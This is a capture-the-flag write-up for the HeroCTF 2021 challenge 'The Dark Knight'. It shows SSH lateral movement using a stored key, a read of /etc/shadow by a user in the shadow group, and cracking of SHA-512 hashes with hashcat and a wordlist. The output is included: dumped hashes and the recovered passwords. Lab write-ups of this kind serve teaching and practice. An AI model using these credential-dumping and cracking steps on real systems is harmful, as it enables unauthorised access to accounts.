HeroCTF v3 2021: The Dark Knight

$ ssh [email protected] -p 5005
password : password123

ssh [email protected] -p 5005
[email protected]'s password: 

The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.


The Batman is lurking in the shadows, ready to take down the next criminal. Usually we don't mind, but he has some critical intel he wont share about the Joker : his password one the network. Gordon, find who he is and get the intel. We know it's one of the users of this network. Good luck.


The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

Last login: Sat Apr 24 20:41:00 2021 from 89.65.174.13
gordon@2166182c647d:~$ ls -al
total 24
drwxr-xr-x 1 root   root   4096 Apr 24 08:50 .
drwxr-xr-x 1 root   root   4096 Apr 23 19:02 ..
lrwxrwxrwx 1 root   root      9 Apr 24 08:50 .bash_history -> /dev/null
drwxr-xr-x 1 gordon gordon 4096 Apr 24 19:28 .ssh
gordon@2166182c647d:~$ ls -al .ssh
total 36
drwxr-xr-x 1 gordon gordon 4096 Apr 24 19:28 .
drwxr-xr-x 1 root   root   4096 Apr 24 08:50 ..
-rw-rw-r-- 1 gordon gordon  401 Apr 24 19:29 authorized_keys
-rw------- 1 gordon gordon 1675 Apr 23 19:01 id_rsa
-rw-r--r-- 1 gordon gordon  401 Apr 23 19:01 id_rsa.pub
-rw------- 1 gordon gordon 3108 Apr 24 19:34 known_hosts
-rw-r--r-- 1 gordon gordon 1776 Apr 24 14:08 known_hosts.old

ssh bradley_warner@localhost

The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.


The Batman is lurking in the shadows, ready to take down the next criminal. Usually we don't mind, but he has some critical intel he wont share about the Joker : his password one the network. Gordon, find who he is and get the intel. We know it's one of the users of this network. Good luck.


The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

Last login: Sat Apr 24 20:43:54 2021 from 127.0.0.1
bradley_warner@2166182c647d:~$ groups
shadow

cat /etc/shadow
root:*:18711:0:99999:7:::
daemon:*:18711:0:99999:7:::
bin:*:18711:0:99999:7:::
sys:*:18711:0:99999:7:::
sync:*:18711:0:99999:7:::
games:*:18711:0:99999:7:::
man:*:18711:0:99999:7:::
lp:*:18711:0:99999:7:::
mail:*:18711:0:99999:7:::
news:*:18711:0:99999:7:::
uucp:*:18711:0:99999:7:::
proxy:*:18711:0:99999:7:::
www-data:*:18711:0:99999:7:::
backup:*:18711:0:99999:7:::
list:*:18711:0:99999:7:::
irc:*:18711:0:99999:7:::
gnats:*:18711:0:99999:7:::
nobody:*:18711:0:99999:7:::
_apt:*:18711:0:99999:7:::
systemd-network:*:18740:0:99999:7:::
systemd-resolve:*:18740:0:99999:7:::
messagebus:*:18740:0:99999:7:::
sshd:*:18740:0:99999:7:::
gordon:$6$Vp6M89pH$b9iCD2acceEx128f2bOJo4o7O8C8cJ/w1NhtYlySpt.h3QKM2CYtQ3h/qH7ZtypayuD.eQhEIeTPH0Qp9Uuc1/:18740:0:99999:7:::
joker:$6$1WKh.4te$KkJ/Iesdw1yOnGdH2UDFvlh45Ycl0RNcm/tk57hBJMgDQg73t/D0mUwrAQeKtoeoeLYyZXB5VYX.Ifecx.leP/:18740:0:99999:7:::
bradley_warner:*:18740:0:99999:7:::
black_williams:*:18740:0:99999:7:::
brett_willis:*:18740:0:99999:7:::
bonnie_winter:*:18740:0:99999:7:::

hashcat.bin -m 1800 -d 1 -a 0 hashes.txt rockyou.txt

hashcat.bin -m 1800 --show hashes 
$6$Vp6M89pH$b9iCD2acceEx128f2bOJo4o7O8C8cJ/w1NhtYlySpt.h3QKM2CYtQ3h/qH7ZtypayuD.eQhEIeTPH0Qp9Uuc1/:password123
$6$1WKh.4te$KkJ/Iesdw1yOnGdH2UDFvlh45Ycl0RNcm/tk57hBJMgDQg73t/D0mUwrAQeKtoeoeLYyZXB5VYX.Ifecx.leP/:ilovebatman